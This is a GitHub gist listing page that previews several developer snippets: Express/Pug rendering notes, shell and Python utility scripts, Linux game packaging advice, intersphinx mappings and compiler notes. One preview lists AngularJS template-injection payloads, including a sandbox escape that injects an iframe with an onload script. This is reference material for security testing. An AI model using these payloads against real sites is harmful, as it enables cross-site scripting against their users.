Skip to content

Instantly share code, notes, and snippets.

View ssokolow's full-sized avatar

Stephan Sokolow ssokolow

104 followers · 2 following
View GitHub Profile
@joepie91
joepie91 / express-server-side-rendering.md
Last active July 26, 2024 09:56
Rendering pages server-side with Express (and Pug)

Terminology

  • View: Also called a "template", a file that contains markup (like HTML) and optionally additional instructions on how to generate snippets of HTML, such as text interpolation, loops, conditionals, includes, and so on.
  • View engine: Also called a "template library" or "templater", ie. a library that implements view functionality, and potentially also a custom language for specifying it (like Pug does).
  • HTML templater: A template library that's designed specifically for generating HTML. It understands document structure and thus can provide useful advanced tools like mixins, as well as more secure output escaping (since it can determine the right escaping approach from the context in which a value is used), but it also means that the templater is not useful for anything other than HTML.
  • String-based templater: A template library that implements templating logic, but that has no understanding of the content it is generating - it simply concatenates together strings, potenti
@anp
anp / coverage.py
Created September 20, 2016 16:13
rust code coverage with kcov
#!/usr/bin/env python2
# butchered from https://github.com/huonw/travis-cargo
# under MIT license
from __future__ import print_function
import argparse
import os
import sys
import subprocess
@HaleTom
HaleTom / print256colours.sh
Last active April 8, 2025 20:40
Print a 256-colour test pattern in the terminal
#!/bin/bash
# Tom Hale, 2016. MIT Licence.
# Print out 256 colours, with each number printed in its corresponding colour
# See http://askubuntu.com/questions/821157/print-a-256-color-test-pattern-in-the-terminal/821163#821163
set -eu # Fail on errors or undeclared variables
printable_colours=256
@joepvd
joepvd / help-gnu.zsh
Last active January 8, 2022 17:40
# Love you, GNU. But got a bit tired of this conversation pattern:
#
# % ln -h
# ln: invalid option -- 'h'
# Try 'ln --help' for more information.
#
# Don't worry. I fixed you for me.
#
# Eternally yours,
#
@mccabe615
mccabe615 / AngularTI.md
Last active April 9, 2025 02:27
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@shmerl
shmerl / gog_dex_extract_music.sh
Last active January 8, 2022 17:40
#!/bin/bash
# Usage: gog_dex_extract_music.sh <data_dir>
#
# The script relies on these utilities:
# 1. QuickBMS extractor (quickbms)
# See http://aluigi.altervista.org/quickbms.htm
# Source: http://aluigi.altervista.org/papers/quickbms_src.zip
#
# 2. Unity BMS script to be used with QuickBMS (unity.bms)
@flibitijibibo
flibitijibibo / flibitPackaging.md
Created June 17, 2016 16:00
Hope you like reading ldd output!

A week ago I was CC'd in on a thread about Linux packaging, and how to avoid doing it the wrong way (i.e. RPM, Deb, etc.). I've always used MojoSetup and I've never forced distributions to do any additional work, but this is still a new concept to a lot of people. Additionally, Amos suggested that I expand on Itch's FNA appendix, so here's a guide on how I package my games.

This is a bit of an expansion on my MAGFest 2016 presentation, which you can find here:

http://www.flibitijibibo.com/magfest2016/

https://www.youtube.com/watch?v=B83CWUh0Log

I would recommend looking at that first! After that, read on...

@bskinn
bskinn / intersphinx_mappings.txt
Last active March 29, 2025 06:58
Various intersphinx mappings
# The entries in this file are checked regularly for validity via the Github Action
# sited at github.com/bskinn/intersphinx-gist.
# Please feel free to post an issue at that repo if any of these mappings don't work for you,
# or if you're having trouble constructing a mapping for a project not listed here.
Python 3 [latest]: ('https://docs.python.org/3/', None)
Python 3 [3.x]: ('https://docs.python.org/3.9/', None)
attrs [stable]: ('https://www.attrs.org/en/stable/', None)
Django [dev]: ('https://docs.djangoproject.com/en/dev/', 'https://docs.djangoproject.com/en/dev/_objects/')
Flask [2.2.x]: ('https://flask.palletsprojects.com/en/2.2.x/', None)
@shmerl
shmerl / wine_dx11_status.sh
Last active January 8, 2022 17:40
#!/bin/bash
# Shows status of selected wine dlls (like for DX11).
# Inspired by https://www.winehq.org/winapi_stats.
# The script works best in terminals with true color support,
# but it should work with less colors as well.
function no_clr()
{
printf '\x1b[0m'
@rygorous
rygorous / gist:e0f055bfb74e3d5f0af20690759de5a7
Created May 8, 2016 06:54
A bit of background on compilers exploiting signed overflow
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those
mysterious cases where it helps?
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but
I think it's useful to know what compiler writers are accomplishing by this.
TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some
fairly common cases. The signed overflow UB exploitation is an attempt to work around this.